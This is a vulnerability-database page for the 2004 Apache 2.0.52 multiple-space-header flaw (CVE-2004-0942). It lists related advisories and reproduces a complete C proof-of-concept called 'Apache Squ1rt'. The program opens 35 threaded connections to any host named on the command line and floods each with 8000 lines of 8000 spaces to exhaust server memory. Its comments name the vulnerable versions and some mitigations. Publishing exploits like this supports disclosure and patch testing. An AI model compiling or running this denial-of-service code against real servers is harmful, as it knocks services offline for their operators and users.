Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Apache 2.0.52 Multiple Space Header Denial of Service Exploit (v2)

🗓️ 18 Nov 2004 00:00:00Reported by Daniel GuidoType 
zdt
 zdt🔗 0day.today👁 29 Views

Denial of Service exploit for Apache 2.0.52 using multiple space headers to consume RAM resources.

Related
Code
ReporterTitlePublishedViews
Family
ALT Linux		Security fix for the ALT Linux 9 package apache2 version 2.0.52-alt3
27 Dec 200400:00
altlinux
ALT Linux		Security fix for the ALT Linux 8 package apache2 version 2.0.52-alt3
27 Dec 200400:00
altlinux
ALT Linux		Security fix for the ALT Linux 10 package apache2 version 2.0.52-alt3
27 Dec 200400:00
altlinux
0day.today		Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
4 Mar 200500:00
zdt
FreeBSD		apache2 multiple space header denial-of-service vulnerability
1 Nov 200400:00
freebsd
CVE		CVE-2004-0942
4 Nov 200405:00
cve
Cvelist		CVE-2004-0942
4 Nov 200405:00
cvelist
Debian CVE		CVE-2004-0942
4 Nov 200405:00
debiancve
Exploit DB		Apache 2.0.52 - GET Denial of Service
4 Mar 200500:00
exploitdb
exploitpack		Apache 2.0.52 - GET Denial of Service
4 Mar 200500:00
exploitpack
Rows per page
==================================================================
Apache 2.0.52 Multiple Space Header Denial of Service Exploit (v2)
==================================================================




/*
Apache Squ1rt, Denial of Service Proof of Concept
Tested on Apache 2.0.52

[email protected]
[email protected]

Sends a request that starts with:
GET / HTTP/1.0\n
8000 spaces \n
8000 spaces \n
8000 spaces \n
...
8000 times

Apache never kills it. Takes up huge amounts of
RAM which increase with each connection.

Original credit goes to Chintan Trivedi on the
FullDisclosure mailing list:
http://seclists.org/lists/fulldisclosure/2004/Nov/0022.html

More info:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942

Versions between 2.0.35 and 2.0.52 may be vulnerable,
but only down to 2.0.50 was tested.

This attack may be preventable with a properly configured
iptables ruleset. Gentoo already has a patch out in the
2.0.52-r1 release in the file 06_all_gentoo_protocol.patch

v2
Rewritten to use pthread.
gcc apache-squ1rt.c -lpthread
*/

#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <pthread.h>
#define DEST_PORT 80

void *squirtIt(char *hName);

char attackBuf[8000];
char letsGetStarted[128];

int main(int argc, char **argv){
       int num_connect;
       int ret;
       pthread_t tid[35];

       sprintf(letsGetStarted, "GET / HTTP/1.0\n");
       memset(attackBuf, ' ', 8000);
       attackBuf[7998]='\n';
       attackBuf[7999]='\0';

       if (argc != 2){
               fprintf(stderr, "Usage: %s <host name> \n", argv[0]);
               exit(1);
       }

       for(num_connect = 0; num_connect < 35; num_connect++){
               ret = pthread_create(&tid[num_connect], NULL, (void *)squirtIt, argv[1]);
       }

       /* assuming any of these threads actually terminate, this waits for
all of them */
       for(num_connect = 0; num_connect < 35; num_connect++){
               pthread_join(tid[num_connect], NULL);
       }

 return 0;
}

void *squirtIt(char *hName){
       int sock, i;
       struct hostent *target;
       struct sockaddr_in addy;

       if((target = gethostbyname(hName)) == NULL){
               herror("gethostbyname()");
               exit(1);
       }

       if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
               perror("socket()");
               exit(1);
       }

       addy.sin_family = AF_INET;
       addy.sin_port = htons(DEST_PORT);
       bcopy(target->h_addr, (char *)&addy.sin_addr, target->h_length );
       memset(&(addy.sin_zero), '\0', 8);

       if((connect(sock, (struct sockaddr*)&addy, sizeof(addy))) < 0){
               perror("connect()");
               exit(1);
       }

       send(sock, letsGetStarted, strlen(letsGetStarted), 0);

       for(i=0; i < 8000; i++){
               send(sock, attackBuf, strlen(attackBuf), 0);
       }

       close(sock);
}



#  0day.today [2018-02-16]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Nov 2004 00:00Current
7High risk
Vulners AI Score7
EPSS0.79222
apache exploitdenial of servicememory consumptionmultiple space headersvulnerability testingiptables patch.
29